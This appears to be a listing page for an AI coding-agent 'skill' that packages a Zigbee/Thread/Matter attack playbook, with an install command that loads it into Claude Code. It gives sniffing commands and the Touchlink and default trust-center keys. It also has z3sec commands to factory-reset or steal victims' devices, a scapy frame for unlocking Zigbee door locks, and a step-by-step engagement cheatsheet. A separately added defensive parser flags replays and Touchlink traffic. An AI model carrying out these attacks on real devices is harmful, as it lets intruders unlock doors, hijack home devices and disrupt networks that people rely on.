ClaudeWave

offensive-zigbee-thread-matter

Offensive-zigbee-thread-matter is a mesh-protocol attack toolkit targeting IEEE 802.15.4-based smart-home networks, covering sniffing via TI CC2531/CC2540 or Sonoff dongles with KillerBee, Touchlink commissioning abuse using well-known transport keys, and ZCL command injection for lights and locks. Deploy against Zigbee door locks, lighting systems, Thread networks, and Matter-enabled devices to capture network credentials, perform replay attacks, or remotely control commissioned devices.

Install in Claude Code
git clone --depth 1 https://github.com/SnailSploit/Claude-Red /tmp/offensive-zigbee-thread-matter && cp -r /tmp/offensive-zigbee-thread-matter/Skills/wireless/offensive-zigbee-thread-matter ~/.claude/skills/offensive-zigbee-thread-matter
Then start a new Claude Code session; the skill loads automatically.

SKILL.md

# Zigbee / Thread / Matter Attacks

802.15.4-based mesh protocols underpin most "smart home" devices. Zigbee is widely deployed and has well-known crypto-key-reuse issues; Thread (modern, IPv6-based) ships with stronger defaults; Matter unifies their commissioning model with stronger crypto but still has implementation pitfalls.

## Quick Workflow

1. Sniff target frequency (channels 11–26 in 2.4 GHz)
2. Identify network coordinator and joining devices
3. For Zigbee: try Touchlink commissioning with the well-known key
4. Capture join-key exchange when devices commission
5. Replay or inject ZCL/ZHA cluster commands

---

## Hardware

| Adapter | Use |
|---|---|
| TI CC2531 USB stick | Cheap, works with Zigbee2MQTT, KillerBee |
| TI CC2540 / CC2652 | Zigbee + Thread + BLE |
| Sonoff Zigbee Dongle E (CC2652P) | Modern, well-supported |
| ApiMote (KillerBee dev) | Multi-channel, scapy-dot15d4 |
| HackRF + appropriate firmware | Lower-level RF flexibility |

## Discovery + Sniffing

```bash
# KillerBee suite
zbstumbler -i 0                 # find Zigbee networks (beacon requests, channels 11-26)
zbid                            # list attached KillerBee-compatible radios
zbdump -c 11 -w zigbee.pcap     # dump channel 11 to pcap

# scapy dissection of the capture (dot15d4/zigbee live in scapy.layers in
# current releases; older ones shipped them as scapy.contrib.dot15d4/zigbee)
python3
>>> from scapy.all import *
>>> from scapy.layers.dot15d4 import *
>>> from scapy.layers.zigbee import *
>>> conf.dot15d4_protocol = "zigbee"   # dissect Dot15d4Data payloads as ZigbeeNWK
>>> rdpcap('zigbee.pcap').summary()
```

In Wireshark with the IEEE 802.15.4 (dot15d4) and ZigBee NWK (zbee_nwk) dissectors, you'll see MAC addressing and NWK security frame counters on every frame, the network key itself if a transport-key frame from a join was captured, and decrypted APS/ZCL commands once that key is entered in the dissector preferences.

## Touchlink Commissioning Abuse

Touchlink (used by Zigbee 3.0 commissioning, especially in lighting) uses a **well-known transport key**:

```
0x9F559A553B7A6B2C5C4FBB4E84956F3D
```

Many consumer Zigbee bulbs / strips accept Touchlink commissioning from any nearby radio with this key — joining them to your network or stealing them from theirs.

```bash
# z3sec — Zigbee 3 commissioning attack toolkit
git clone https://github.com/IoTsec/Z3sec
python z3sec_inter_pan.py --command "factory_reset_request" --device <addr>
python z3sec_inter_pan.py --command "join_network" --network <PANID>
```

Outcomes:
- Factory-reset victim devices remotely (DoS / mass disrupt)
- Steal lights / sensors into attacker network
- Read the network key once a device has been joined to a network

## Network Key Capture During Joins

```bash
# Capture coordinator + joining device exchange
zbdump -c <ch> -w join.pcap

# Decrypt if you obtain the trust center link key
# Older Zigbee 1.x networks used a default trust center link key:
# ZigBeeAlliance09
# Modern networks use device-specific install codes
```

Once you have the network key, all traffic on that mesh is decrypted in Wireshark.

## ZCL / ZHA Cluster Command Abuse

The Zigbee Cluster Library (ZCL) defines the on/off, level-control and door-lock clusters, among others. With the network key, you can issue cluster commands as any device on the mesh:

```python
# scapy-dot15d4 frame to unlock a door lock
from scapy.contrib.dot15d4 import *
from scapy.contrib.zigbee import *

frame = Dot15d4FCS()/Dot15d4Data()/ZigbeeNWK(...)/ZigbeeAppDataPayload(...)/ZCLDoorLock(...)
sendp(frame, iface='/dev/ttyACM0')
```

The same primitive opens locks, toggles switches, dims lights, or floods the network with control traffic.

## Thread Specifics

Thread (used by Apple HomePod, Nest, Eero) uses 802.15.4 with IPv6 (6LoWPAN) and stronger commissioning crypto.

- Network credential is a **commissioner-distributed PSKc**
- Devices join with the commissioner present
- The Mesh Commissioning Protocol (MeshCoP) runs over UDP/CoAP, secured with DTLS

Attack surface:
- PSKc theft from commissioner devices (mobile app companion, Apple Home, Nest app)
- Reusing a leaked credential to join target network
- 6LoWPAN routing attacks (rank manipulation, sinkhole)

## Matter Commissioning

Matter unifies Zigbee/Thread/Wi-Fi device onboarding under one commissioning model:

- QR code or manual setup code grants commissioning permission
- Bluetooth LE used for initial commissioning
- Subsequent communication over Wi-Fi or Thread

Attack surface:
- Setup-code reuse / replay if commissioning window not closed
- BLE-MITM during initial commissioning (see `offensive-bluetooth-ble`)
- Fabric-attestation flaws in early implementations

## Detection

- Coordinator may log unexpected device joins
- Hub apps surface "new device" notifications — commonly ignored by users
- Wireshark/Sonoff captures from defenders are rare — most environments don't monitor 802.15.4
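Frame-level view of what a monitoring radio sees, serving both the capture discussion under Discovery + Sniffing and the Detection section above: an added example, not part of this skill or of KillerBee/scapy, that parses the 802.15.4 MAC header, Zigbee NWK header and security aux header from raw frames, then flags NWK frame counters that fail to advance (replayed frames) and inter-PAN stub frames (Touchlink commissioning traffic). The sample frames, PAN ID and addresses are constructed; the parser assumes the common short-destination / PAN-compressed addressing and rejects anything else.

```python
import struct
NWK_INTERPAN = 3  # stub NWK frame type used by Touchlink/ZLL inter-PAN commissioning

def parse_nwk(raw: bytes) -> dict:
    """MAC/NWK header fields of one 802.15.4 data frame (FCS stripped). Assumes PAN-ID
    compression + short dst address (FCF 0x8861/0xC841) and the standard network-key aux header."""
    fcf, = struct.unpack_from("<H", raw, 0)
    src_mode = (fcf >> 14) & 3
    if fcf & 7 != 1 or not fcf & 0x40 or (fcf >> 10) & 3 != 2 or src_mode not in (2, 3):
        raise ValueError("unsupported MAC frame type or addressing")
    pan_id, mac_dst = struct.unpack_from("<HH", raw, 3)
    fmt = "<H" if src_mode == 2 else "<Q"          # short (2) or IEEE (8) source address
    mac_src, = struct.unpack_from(fmt, raw, 7)
    off = 7 + struct.calcsize(fmt)
    nwk_fcf, = struct.unpack_from("<H", raw, off)
    f = {"pan_id": pan_id, "mac_src": mac_src, "mac_dst": mac_dst,
         "nwk_type": nwk_fcf & 3, "secured": bool(nwk_fcf & 0x0200),
         "frame_counter": None, "src_ext": None}
    if f["nwk_type"] == NWK_INTERPAN:
        return f                                   # stub header: no addressing, no security
    off += 8                                       # NWK FCF, dst, src, radius, seq
    off += 8 * bool(nwk_fcf & 0x0800) + 8 * bool(nwk_fcf & 0x1000)  # optional IEEE addrs
    if f["secured"]:                               # aux header: ctrl(1) counter(4) [ieee(8)] keyseq(1)
        f["frame_counter"], = struct.unpack_from("<I", raw, off + 1)
        if raw[off] & 0x20:                        # extended-nonce bit: sender IEEE addr follows
            f["src_ext"], = struct.unpack_from("<Q", raw, off + 5)
    return f

def check_frame(f: dict, last: dict) -> str:
    """Verdict for one parsed frame; `last` maps sender -> highest NWK frame counter seen.
    A counter that fails to advance is a replayed/re-injected frame, visible without the key."""
    if f["nwk_type"] == NWK_INTERPAN:
        return "interpan"                          # commissioning traffic; expected only during setup
    if not f["secured"]:
        return "unsecured"
    sender = f["src_ext"] if f["src_ext"] is not None else (f["pan_id"], f["mac_src"])
    if sender in last and f["frame_counter"] <= last[sender]:
        return "replay"
    last[sender] = f["frame_counter"]
    return "ok"

def run_monitor(frames) -> list:
    last = {}                                      # feed frames in capture order, collect verdicts
    return [check_frame(parse_nwk(raw), last) for raw in frames]

# Constructed sample frames (not real captures): device 0x1234 -> coordinator 0x0000 on PAN 0x1A62.
HDR = "6188" "10" "621a" "0000" "3412" "0802" "0000" "3412" "1e" "55" "28"
FRAME_1 = bytes.fromhex(HDR + "00100000" + "78563412004b1200" + "00" + "deadbeefcafe" + "01020304")
FRAME_2 = bytes.fromhex(HDR + "01100000" + "78563412004b1200" + "00" + "0badf00d1234" + "05060708")
TOUCHLINK_SCAN = bytes.fromhex("41c8" "05" "ffff" "ffff" "78563412004b1200" "0b00" "03" "0010" "5ec0")
```

A coordinator or passive sniffer applying this to a live channel gets a key-independent alert for replayed control frames and for Touchlink activity outside a maintenance window.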

## Engagement Cheatsheet

```bash
# 1. Identify networks + channels
zbstumbler -i 0

# 2. Sniff target channel
zbdump -c <ch> -w cap.pcap
# Open in Wireshark with dot15d4/zigbee dissectors

# 3. Touchlink attack on consumer Zigbee 3.0 lighting
python z3sec_inter_pan.py --command "factory_reset_request" --target <addr>

# 4. Steal device into attacker network
python z3sec_inter_pan.py --command "join_network" --target <addr>

# 5. With network key, issue ZCL commands directly
# (custom scapy-dot15d4 + zbee_nwk frames)

# 6. For Thread: focus on commissioner / PSKc theft from companion apps
```

---

## Key References

- KillerBee: github.com/riverloopsec/killerbee
- Z3sec: github.com/IoTsec/Z3sec
- "Zigbee Insecurity" research (CON Black Hat talks)
- Thread spec: threadgroup.org/support
- Matter / CSA spec: csa-iot.org/all-solutions/matter
- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md